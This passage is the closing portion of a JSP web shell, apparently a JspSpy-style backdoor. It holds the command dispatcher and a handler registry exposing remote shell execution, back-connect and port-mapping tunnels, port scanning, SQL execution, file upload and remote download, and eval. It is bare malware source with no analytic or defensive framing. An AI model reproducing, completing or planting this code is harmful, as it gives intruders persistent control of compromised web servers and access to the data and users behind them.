3184public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
3185try {
3186String type = request.getParameter("type");
3187PrintWriter out = response.getWriter();
3188if (type.equals("update")) {
3189String name = request.getParameter("name");
3190String value = request.getParameter("value");
3191JSession.setAttribute(name,value);
3192JSession.setAttribute(MSG,"Update/Add Attribute Success !");
3193} else if (type.equals("delete")) {
3194String name = request.getParameter("name");
3195JSession.removeAttribute(name);
3196JSession.setAttribute(MSG,"Remove Attribute Success !");
3197}
3198((Invoker)ins.get("vother")).invoke(request,response,JSession);
3199} catch (Exception e) {
3200
3201throw e ;
3202}
3203}
3204}
3205
3206static{
3207ins.put("script",new ScriptInvoker());
3208ins.put("before",new BeforeInvoker());
3209ins.put("after",new AfterInvoker());
3210ins.put("deleteBatch",new DeleteBatchInvoker());
3211ins.put("clipboard",new ClipBoardInvoker());
3212ins.put("vPortScan",new VPortScanInvoker());
3213ins.put("portScan",new PortScanInvoker());
3214ins.put("vConn",new VConnInvoker());
3215ins.put("dbc",new DbcInvoker());
3216ins.put("executesql",new ExecuteSQLInvoker());
3217ins.put("vLogin",new VLoginInvoker());
3218ins.put("login",new LoginInvoker());
3219ins.put("filelist", new FileListInvoker());
3220ins.put("logout",new LogoutInvoker());
3221ins.put("upload",new UploadInvoker());
3222ins.put("copy",new CopyInvoker());
3223ins.put("bottom",new BottomInvoker());
3224ins.put("vCreateFile",new VCreateFileInvoker());
3225ins.put("vEdit",new VEditInvoker());
3226ins.put("createFile",new CreateFileInvoker());
3227ins.put("vEditProperty",new VEditPropertyInvoker());
3228ins.put("editProperty",new EditPropertyInvoker());
3229ins.put("vs",new VsInvoker());
3230ins.put("shell",new ShellInvoker());
3231ins.put("down",new DownInvoker());
3232ins.put("vd",new VdInvoker());
3233ins.put("downRemote",new DownRemoteInvoker());
3234ins.put("index",new IndexInvoker());
3235ins.put("mkdir",new MkDirInvoker());
3236ins.put("move",new MoveInvoker());
3237ins.put("removedir",new RemoveDirInvoker());
3238ins.put("packBatch",new PackBatchInvoker());
3239ins.put("pack",new PackInvoker());
3240ins.put("unpack",new UnPackInvoker());
3241ins.put("vmp",new VmpInvoker());
3242ins.put("vbc",new VbcInvoker());
3243ins.put("backConnect",new BackConnectInvoker());
3244ins.put("jspEnv",new JspEnvInvoker());
3245ins.put("smp",new SmpInvoker());
3246ins.put("mapPort",new MapPortInvoker());
3247ins.put("top",new TopInvoker());
3248ins.put("vso",new VOnLineShellInvoker());
3249ins.put("online",new OnLineInvoker());
3250ins.put("enter",new EnterInvoker());
3251ins.put("export",new ExportInvoker());
3252ins.put("ev",new EvalInvoker());
3253ins.put("eu",new EvalUploadInvoker());
3254ins.put("vother",new VOtherInvoker());
3255ins.put("sm",new SmInvoker());
3256ins.put("vExport",new VExport2FileInvoker());
3257ins.put("vPack",new VPackConfigInvoker());
3258ins.put("reflect",new ReflectInvoker());
3259ins.put("portBack",new PortBackInvoker());
3260}
3261%>
3262<%
3263try {
3264String o = request.getParameter("o");
3265if (Util.isEmpty(o)) {
3266if (session.getAttribute(SESSION_O) == null)
3267o = "index";
3268else {
3269o = session.getAttribute(SESSION_O).toString();
3270session.removeAttribute(SESSION_O);
3271}
3272}
3273Object obj = ins.get(o);
3274if (obj == null) {
3275response.sendRedirect(SHELL_NAME);
3276} else {
3277Invoker in = (Invoker)obj;
3278if (in.doBefore()) {
3279String path = request.getParameter("folder");
3280if (!Util.isEmpty(path) && session.getAttribute(ENTER) == null)
3281session.setAttribute(CURRENT_DIR,path);
3282((Invoker)ins.get("before")).invoke(request,response,session);
3283((Invoker)ins.get("script")).invoke(request,response,session);
3284((Invoker)ins.get("top")).invoke(request,response,session);
3285}
3286in.invoke(request,response,session);
3287if (!in.doAfter()) {
3288return;
3289}else{
3290((Invoker)ins.get("bottom")).invoke(request,response,session);
3291((Invoker)ins.get("after")).invoke(request,response,session);
3292}
3293}
3294} catch (Exception e) {
3295Object msg = session.getAttribute(MSG);
3296if (msg != null) {
3297Util.outMsg(out,(String)msg);
3298session.removeAttribute(MSG);
3299}
3300if (e.toString().indexOf("ClassCastException") != -1) {
3301Util.outMsg(out,MODIFIED_ERROR + BACK_HREF);
3302}
3303ByteArrayOutputStream bout = new ByteArrayOutputStream();
3304e.printStackTrace(new PrintStream(bout));
3305session.setAttribute(CURRENT_DIR,SHELL_DIR);
3306Util.outMsg(out,Util.htmlEncode(new String(bout.toByteArray())).replaceAll("\n","<br/>"),"left");
3307bout.close();
3308out.flush();
3309((Invoker)ins.get("bottom")).invoke(request,response,session);
3310((Invoker)ins.get("after")).invoke(request,response,session);
3311}
3312%>